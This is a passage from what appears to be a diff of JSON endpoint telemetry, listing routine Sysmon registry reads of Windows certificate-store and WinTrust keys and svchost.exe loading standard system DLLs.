"registry_value": "Disallowed", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "userenv.dll", - "image_path": "C:\\Windows\\System32\\userenv.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ssdpapi.dll", - "image_path": "C:\\Windows\\System32\\ssdpapi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878240000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "gpapi.dll", - "image_path": "C:\\Windows\\System32\\gpapi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880270000, - "unique_pid": 